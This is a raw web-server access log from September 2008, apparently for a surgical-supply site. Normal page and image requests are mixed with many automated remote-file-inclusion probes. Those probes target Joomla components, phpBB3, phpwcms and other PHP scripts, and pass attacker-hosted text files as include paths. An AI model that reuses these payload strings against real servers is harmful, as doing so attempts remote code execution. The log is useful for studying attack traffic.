62.87.154.41 - - [09/Sep/2008:00:37:29 -0400] "GET /logs/access_log.Q108082400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:00:37:29 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:00:37:29 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:00:37:36 -0400] "GET /logs/access_log.Q108071300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
202.83.67.100 - - [09/Sep/2008:00:37:38 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
202.83.67.100 - - [09/Sep/2008:00:37:39 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
62.87.154.41 - - [09/Sep/2008:00:37:55 -0400] "GET /logs/access_log.Q108071300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
200.93.147.155 - - [09/Sep/2008:00:39:03 -0400] "GET /logs/access_log.Q108081700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
70.85.102.100 - - [09/Sep/2008:00:39:06 -0400] "GET /errors.php?error=http://www.geocities.com/desirisma/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
70.85.102.100 - - [09/Sep/2008:00:39:06 -0400] "GET /logs/errors.php?error=http://www.geocities.com/desirisma/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
70.85.102.100 - - [09/Sep/2008:00:39:07 -0400] "GET /logs/errors.php?error=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.61 [en] (OS/2; U)"
70.85.102.100 - - [09/Sep/2008:00:39:07 -0400] "GET /errors.php?error=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.59.12.99 - - [09/Sep/2008:00:39:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.185.82.194 - - [09/Sep/2008:00:39:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
24.185.82.194 - - [09/Sep/2008:00:40:05 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
24.185.82.194 - - [09/Sep/2008:00:40:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
24.185.82.194 - - [09/Sep/2008:00:40:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
200.49.100.20 - - [09/Sep/2008:00:42:06 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 248 "-" "libwww-perl/5.69"
200.49.100.20 - - [09/Sep/2008:00:42:11 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 274 "-" "libwww-perl/5.69"
200.49.100.20 - - [09/Sep/2008:00:42:13 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.49.100.20 - - [09/Sep/2008:00:42:15 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.49.100.20 - - [09/Sep/2008:00:42:17 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 248 "-" "libwww-perl/5.69"
200.49.100.20 - - [09/Sep/2008:00:42:22 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.69"
200.49.100.20 - - [09/Sep/2008:00:42:33 -0400] "GET /logs/access_log.Q108081400/scanhttp://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.49.100.20 - - [09/Sep/2008:00:42:34 -0400] "GET /scanhttp://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.6.17.183 - - [09/Sep/2008:00:41:55 -0400] "GET /logs/access_log.Q107060500 HTTP/1.0" 200 3203183 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.49.100.20 - - [09/Sep/2008:00:42:42 -0400] "GET /logs/access_log.Q108081400/scanhttp://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 261 "-" "libwww-perl/5.69"
200.49.100.20 - - [09/Sep/2008:00:42:42 -0400] "GET /scanhttp://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
200.49.100.20 - - [09/Sep/2008:00:42:46 -0400] "GET /logs/scanhttp://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.69"
69.72.133.226 - - [09/Sep/2008:00:43:22 -0400] "GET /logs/access_log.Q108082400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.810"
69.72.133.226 - - [09/Sep/2008:00:43:22 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
193.239.159.34 - - [09/Sep/2008:00:44:22 -0400] "GET /logs/access_log.Q108081900/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
193.239.159.34 - - [09/Sep/2008:00:44:22 -0400] "GET /logs/error_log.Q108052600/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.811"
193.239.159.34 - - [09/Sep/2008:00:44:24 -0400] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
193.239.159.34 - - [09/Sep/2008:00:44:24 -0400] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
69.72.133.226 - - [09/Sep/2008:00:44:27 -0400] "GET /logs/access_log.Q108071300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.810"
209.59.12.99 - - [09/Sep/2008:00:44:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.49.100.20 - - [09/Sep/2008:00:44:36 -0400] "GET /logs/error_log.Q108081400/scanhttp://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 260 "-" "libwww-perl/5.69"
212.97.132.101 - - [09/Sep/2008:00:45:07 -0400] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 404 245 "-" "libwww-perl/5.53"
212.97.132.101 - - [09/Sep/2008:00:45:07 -0400] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 404 240 "-" "libwww-perl/5.53"
212.97.132.101 - - [09/Sep/2008:00:45:07 -0400] "GET /logs/error_log.Q108082100/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
212.97.132.101 - - [09/Sep/2008:00:45:07 -0400] "GET /logs/access_log.Q108081900/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 404 267 "-" "libwww-perl/5.53"
209.97.201.206 - - [09/Sep/2008:00:46:12 -0400] "GET /logs/error_log.Q108041100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://leicht-und-fit.de/webnews/parse/arab.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
200.93.147.155 - - [09/Sep/2008:00:46:56 -0400] "GET /errors.php?error=http://www.geocities.com/linasuci/new.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:00:47:09 -0400] "GET /errors.php?error=http://www.geocities.com/linasuci/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
200.93.147.155 - - [09/Sep/2008:00:47:10 -0400] "GET /logs/errors.php?error=http://www.geocities.com/linasuci/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
69.72.133.226 - - [09/Sep/2008:00:47:15 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
69.72.133.226 - - [09/Sep/2008:00:47:18 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.810"
78.159.111.131 - - [09/Sep/2008:00:47:53 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
78.159.111.131 - - [09/Sep/2008:00:48:00 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
69.72.133.226 - - [09/Sep/2008:00:48:29 -0400] "GET /logs/access_log.Q108071300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.810"
78.159.111.131 - - [09/Sep/2008:00:48:54 -0400] "GET /logs/error_log.Q108060100/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
65.111.166.193 - - [09/Sep/2008:00:49:15 -0400] "GET /logs/error_log.Q108070700//main.php?appserv_root=http://smba.jinju.ac.kr/ismael.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
209.59.12.99 - - [09/Sep/2008:00:49:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.74.141.181 - - [09/Sep/2008:00:49:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:49:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:49:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:49:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
200.49.100.20 - - [09/Sep/2008:00:50:06 -0400] "GET /scanhttp://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
66.74.141.181 - - [09/Sep/2008:00:51:38 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75294 "http://www.acesurgical.com/glustitch.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:39 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:39 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:39 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:39 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:39 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:40 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:40 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:40 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:40 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:40 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:40 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:41 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:41 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:41 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:41 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:42 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:42 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:42 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:42 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:42 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:42 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:43 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:43 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:43 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:43 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:44 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:44 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.74.141.181 - - [09/Sep/2008:00:51:44 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.249.67.114 - - [09/Sep/2008:00:49:15 -0400] "GET /logs/access_log.Q108060600 HTTP/1.1" 200 3080021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.126.46.141 - - [09/Sep/2008:00:52:17 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://carolinegunawan.com/images/gid.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
59.126.46.141 - - [09/Sep/2008:00:52:19 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://carolinegunawan.com/images/gid.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
59.126.46.141 - - [09/Sep/2008:00:52:19 -0400] "GET /logs/access_log.Q108082400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://carolinegunawan.com/images/gid.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
200.49.100.20 - - [09/Sep/2008:00:52:57 -0400] "GET /logs/error_log.Q108022200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 267 "-" "libwww-perl/5.69"
62.94.199.120 - - [09/Sep/2008:00:52:58 -0400] "GET /protection.php?action=logout&siteurl=http://www.sunter.us/a.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
200.49.100.20 - - [09/Sep/2008:00:53:02 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 241 "-" "libwww-perl/5.69"
200.49.100.20 - - [09/Sep/2008:00:53:03 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 246 "-" "libwww-perl/5.69"
209.59.12.99 - - [09/Sep/2008:00:54:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.126.46.141 - - [09/Sep/2008:00:54:31 -0400] "GET /logs/access_log.Q108082400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.grinchradio.com/diegar/did.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
59.126.46.141 - - [09/Sep/2008:00:54:31 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.grinchradio.com/diegar/did.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
80.93.62.97 - - [09/Sep/2008:00:55:06 -0400] "GET /logs/access_log.Q108040800///vwar/backup/errors.php?error=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
80.93.62.97 - - [09/Sep/2008:00:55:06 -0400] "GET /logs/access_log.Q108040800///vwar/backup/errors.php?error=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
80.93.62.97 - - [09/Sep/2008:00:55:08 -0400] "GET ///vwar/backup/errors.php?error=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
80.93.62.97 - - [09/Sep/2008:00:55:08 -0400] "GET ///vwar/backup/errors.php?error=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
80.93.62.97 - - [09/Sep/2008:00:55:09 -0400] "GET /logs///vwar/backup/errors.php?error=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
80.93.62.97 - - [09/Sep/2008:00:55:12 -0400] "GET /logs///vwar/backup/errors.php?error=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:00:55:35 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 267 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.39.5.203 - - [09/Sep/2008:00:55:36 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 240 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
80.93.62.97 - - [09/Sep/2008:00:56:01 -0400] "GET /logs/access_log.Q108080300///vwar/backup/errors.php?error=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:00:56:52 -0400] "GET /logs/access_log.Q108081800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 267 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
65.111.166.193 - - [09/Sep/2008:00:57:28 -0400] "GET /logs//main.php?appserv_root=http://smba.jinju.ac.kr/ismael.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
66.249.67.114 - - [09/Sep/2008:00:55:24 -0400] "GET /logs/access_log.Q108060600 HTTP/1.1" 200 3080021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
